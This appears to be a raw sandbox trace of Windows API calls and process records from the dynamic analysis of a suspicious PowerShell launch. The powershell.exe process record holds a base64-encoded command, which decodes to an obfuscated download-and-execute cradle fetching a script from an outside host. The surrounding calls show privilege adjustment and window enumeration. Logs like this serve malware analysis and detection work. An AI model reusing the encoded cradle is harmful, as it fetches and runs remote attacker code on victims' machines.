	[0977.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0977.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0977.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0977.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0977.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.246] SetConsoleCtrlHandler (HandlerRoutine=0x2d268dc, Add=1) returned 1
	[0981.672] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0981.674] CoCreateGuid (in: pguid=0x1adf10 | out: pguid=0x1adf10*(Data1=0x76e6314e, Data2=0x8270, Data3=0x4ba4, Data4=([0]=0x87, [1]=0x26, [2]=0x83, [3]=0x44, [4]=0x42, [5]=0xcd, [6]=0x29, [7]=0xec))) returned 0x0
	[0981.675] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0981.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0981.675] CoTaskMemFree (pv=0x3d9370) 
	[0981.982] WinSqmIsOptedIn () returned 0x0
	[0981.982] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0981.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0981.982] CoTaskMemFree (pv=0x3d9370) 
	[0981.983] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0981.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0981.983] CoTaskMemFree (pv=0x3d9370) 
	[0981.984] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0981.984] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0981.984] CoTaskMemFree (pv=0x3d9370) 
	[0981.985] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0981.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0981.985] CoTaskMemFree (pv=0x3d9370) 
	[0981.985] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0981.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0981.985] CoTaskMemFree (pv=0x3d9370) 
	[0981.986] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0981.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0981.986] CoTaskMemFree (pv=0x3d9370) 
	[0981.987] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0981.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0981.987] CoTaskMemFree (pv=0x3d9370) 
	[0981.988] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0981.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0981.988] CoTaskMemFree (pv=0x3d9370) 
	[0981.991] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0981.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0981.991] CoTaskMemFree (pv=0x3d9370) 
	[0982.000] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0982.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.000] CoTaskMemFree (pv=0x3d9370) 
	[0982.006] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0982.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.006] CoTaskMemFree (pv=0x3d9370) 
	[0982.006] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0982.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.007] CoTaskMemFree (pv=0x3d9370) 

Thread:
	id = 1098
	os_tid = 0x18f8


Thread:
	id = 1112
	os_tid = 0x1628


Thread:
	id = 1363
	os_tid = 0x1efc


Thread:
	id = 1371
	os_tid = 0x1f34


Thread:
	id = 1448
	os_tid = 0x16ec


Thread:
	id = 1547
	os_tid = 0x207c


Thread:
	id = 1623
	os_tid = 0x2210


Thread:
	id = 1624
	os_tid = 0x2214

	[0826.665] CoGetContextToken (in: pToken=0x288f290 | out: pToken=0x288f290) returned 0x0
	[0826.665] CObjectContext::QueryInterface () returned 0x0
	[0826.666] CObjectContext::GetCurrentThreadType () returned 0x0
	[0826.666] Release () returned 0x0
	[0826.666] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 2154
	os_tid = 0x2470


Process:
	id = "183"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4d396000"
	os_pid = "0x1b8c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1035
	os_tid = 0x1b90

	[0554.723] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0826.783] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0838.433] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.434] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.434] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0838.434] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0915.887] sprintf_s (in: _DstBuf=0x1cf1f8, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0918.134] GetVersionExW (in: lpVersionInformation=0x1cdd00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdd00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0918.139] GetVersionExW (in: lpVersionInformation=0x1cdd00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdd00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0918.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.153] GetVersionExW (in: lpVersionInformation=0x1cda70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cda70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0918.154] SetErrorMode (uMode=0x1) returned 0x1
	[0918.155] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cdbd0 | out: lpFileInformation=0x1cdbd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0918.156] SetErrorMode (uMode=0x1) returned 0x1
	[0918.855] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cde40 | out: lpdwHandle=0x1cde40) returned 0x94c
	[0918.857] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2db72f0 | out: lpData=0x2db72f0) returned 1
	[0918.859] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cddb8, puLen=0x1cddb0 | out: lplpBuffer=0x1cddb8*=0x2db738c, puLen=0x1cddb0) returned 1
	[0918.862] lstrlenW (lpString="䅁") returned 1
	[0918.870] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x2db7468, puLen=0x1cdd20) returned 1
	[0918.871] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0918.873] CoTaskMemAlloc (cb=0x2e) returned 0x37d060
	[0918.873] lstrcpyW (in: lpString1=0x37d060, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0918.874] CoTaskMemFree (pv=0x37d060) 
	[0918.875] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x2db74bc, puLen=0x1cdd20) returned 1
	[0918.875] lstrlenW (lpString="System.Management.Automation") returned 28
	[0918.875] CoTaskMemAlloc (cb=0x3c) returned 0x2b9b30
	[0918.875] lstrcpyW (in: lpString1=0x2b9b30, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0918.875] CoTaskMemFree (pv=0x2b9b30) 
	[0918.875] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x2db7518, puLen=0x1cdd20) returned 1
	[0918.875] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0918.875] CoTaskMemAlloc (cb=0x20) returned 0x37e190
	[0918.875] lstrcpyW (in: lpString1=0x37e190, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0918.875] CoTaskMemFree (pv=0x37e190) 
	[0918.875] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x2db7558, puLen=0x1cdd20) returned 1
	[0918.875] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0918.875] CoTaskMemAlloc (cb=0x44) returned 0x2b9b30
	[0918.875] lstrcpyW (in: lpString1=0x2b9b30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0918.875] CoTaskMemFree (pv=0x2b9b30) 
	[0918.875] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x2db75c0, puLen=0x1cdd20) returned 1
	[0918.875] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0918.876] CoTaskMemAlloc (cb=0x76) returned 0x3213e0
	[0918.876] lstrcpyW (in: lpString1=0x3213e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0918.876] CoTaskMemFree (pv=0x3213e0) 
	[0918.876] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x2db765c, puLen=0x1cdd20) returned 1
	[0918.876] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0918.876] CoTaskMemAlloc (cb=0x44) returned 0x2b9b30
	[0918.876] lstrcpyW (in: lpString1=0x2b9b30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0918.876] CoTaskMemFree (pv=0x2b9b30) 
	[0918.876] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x2db76c0, puLen=0x1cdd20) returned 1
	[0918.876] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0918.876] CoTaskMemAlloc (cb=0x58) returned 0x348d20
	[0918.876] lstrcpyW (in: lpString1=0x348d20, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0918.876] CoTaskMemFree (pv=0x348d20) 
	[0918.876] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x2db773c, puLen=0x1cdd20) returned 1
	[0918.876] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0918.876] CoTaskMemAlloc (cb=0x20) returned 0x37e190
	[0918.876] lstrcpyW (in: lpString1=0x37e190, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0918.876] CoTaskMemFree (pv=0x37e190) 
	[0918.877] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x2db73e4, puLen=0x1cdd20) returned 1
	[0918.877] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0918.877] CoTaskMemAlloc (cb=0x66) returned 0x2fc600
	[0918.877] lstrcpyW (in: lpString1=0x2fc600, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0918.877] CoTaskMemFree (pv=0x2fc600) 
	[0918.877] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x0, puLen=0x1cdd20) returned 0
	[0918.877] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x0, puLen=0x1cdd20) returned 0
	[0918.877] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cdd28, puLen=0x1cdd20 | out: lplpBuffer=0x1cdd28*=0x0, puLen=0x1cdd20) returned 0
	[0918.877] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdcf8, puLen=0x1cdcf0 | out: lplpBuffer=0x1cdcf8*=0x2db738c, puLen=0x1cdcf0) returned 1
	[0918.878] CoTaskMemAlloc (cb=0x204) returned 0x3277c0
	[0918.878] VerLanguageNameW (in: wLang=0x0, szLang=0x3277c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0918.880] CoTaskMemFree (pv=0x3277c0) 
	[0918.880] VerQueryValueW (in: pBlock=0x2db72f0, lpSubBlock="\\", lplpBuffer=0x1cdd48, puLen=0x1cdd40 | out: lplpBuffer=0x1cdd48*=0x2db7318, puLen=0x1cdd40) returned 1
	[0918.889] GetCurrentProcessId () returned 0x1b8c
	[0919.777] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ccc70 | out: lpLuid=0x1ccc70*(LowPart=0x14, HighPart=0)) returned 1
	[0919.780] GetCurrentProcess () returned 0xffffffffffffffff
	[0919.998] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ccc90 | out: TokenHandle=0x1ccc90*=0x2d4) returned 1
	[0919.999] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x2dbab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0920.001] CloseHandle (hObject=0x2d4) returned 1
	[0920.005] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b8c) returned 0x2d4
	[0920.876] EnumProcessModules (in: hProcess=0x2d4, lphModule=0x2dbabd0, cb=0x200, lpcbNeeded=0x1cdca8 | out: lphModule=0x2dbabd0, lpcbNeeded=0x1cdca8) returned 1
	[0920.878] GetModuleInformation (in: hProcess=0x2d4, hModule=0x13f370000, lpmodinfo=0x2dbae40, cb=0x18 | out: lpmodinfo=0x2dbae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0920.879] CoTaskMemAlloc (cb=0x804) returned 0x37f230
	[0920.879] GetModuleBaseNameW (in: hProcess=0x2d4, hModule=0x13f370000, lpBaseName=0x37f230, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0920.880] CoTaskMemFree (pv=0x37f230) 
	[0920.880] CoTaskMemAlloc (cb=0x804) returned 0x37f230
	[0920.880] GetModuleFileNameExW (in: hProcess=0x2d4, hModule=0x13f370000, lpFilename=0x37f230, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0920.881] CoTaskMemFree (pv=0x37f230) 
	[0920.881] CloseHandle (hObject=0x2d4) returned 1
	[0920.894] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1b8c) returned 0x2d4
	[0920.897] GetExitCodeProcess (in: hProcess=0x2d4, lpExitCode=0x1cddd8 | out: lpExitCode=0x1cddd8*=0x103) returned 1
	[0920.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dbb088, Length=0x20000, ResultLength=0x1cdda0 | out: SystemInformation=0x12dbb088, ResultLength=0x1cdda0*=0x4a5a0) returned 0xc0000004
	[0921.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ddb0b8, Length=0x4cda0, ResultLength=0x1cdda0 | out: SystemInformation=0x12ddb0b8, ResultLength=0x1cdda0*=0x4a550) returned 0x0
	[0922.522] EnumWindows (lpEnumFunc=0x2b266ac, lParam=0x0) returned 1
	[0922.524] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.524] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x558
	[0922.524] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.524] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.525] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.525] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x538
	[0922.525] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.525] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x778
	[0922.525] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x778
	[0922.525] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.525] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.525] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.525] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.525] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.525] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.526] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.526] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.526] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x460
	[0922.526] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.526] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0922.526] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2440
	[0922.526] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x24d8
	[0922.526] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1aa4
	[0922.526] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1ff0
	[0922.527] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1a84
	[0922.527] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1fb0
	[0922.527] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1e10
	[0922.527] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x23a8
	[0922.527] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1f24
	[0922.527] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x21ec
